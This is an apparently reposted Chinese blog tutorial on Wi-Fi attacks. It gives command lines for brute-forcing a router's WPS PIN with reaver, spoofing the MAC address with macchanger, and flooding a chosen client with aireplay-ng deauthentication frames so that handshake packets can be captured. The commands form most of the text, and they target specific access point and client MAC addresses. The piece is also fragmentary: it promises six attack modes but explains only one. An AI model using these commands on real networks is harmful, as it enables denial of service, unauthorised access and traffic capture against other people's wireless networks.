Aireplay-ng 6 种常用攻击模式详解

reaver爆破WPS PIN码：

　　airodump-ng wlan0

　　reaver -i wlan0 -b D0:76:E7:51:2A:78 -vv

macchanger更改MAC地址：

　　macchanger -r wlan0

　　-r：随机更换MAC

　　-m：设置指定的MAC地址

　　macchanger -m 72:8e:9c:2d:a8:bb wlan0

airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon

当目标在有客户端在进行下载、看视频等操作时Date值会剧增。

此时开启wireshark打开airodump-ng捕获的cap数据包，可以看到客户端与路由器之间的交互信息

为了能够快速获得大量有用的数据包，可以使用deauth攻击将客户端与目标AP的连接打断再重连。

aireplay-ng --deauth 20000 -a 50:2B:73:18:ED:81 -c A4:50:46:E0:FA:06 wlan0mon

airodump-ng --bssid 50:2B:73:18:ED:81 -c 2 -w test wlan0mon

50:2B:73:18:ED:81 00:02:6f:be:66:41

-0 Deautenticate 冲突模式

使已经连接的合法客户端强制断开与路由端的连接，使其重新连接。在重新连接过程中获得验证数据包，从而产生有效 ARP request。

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！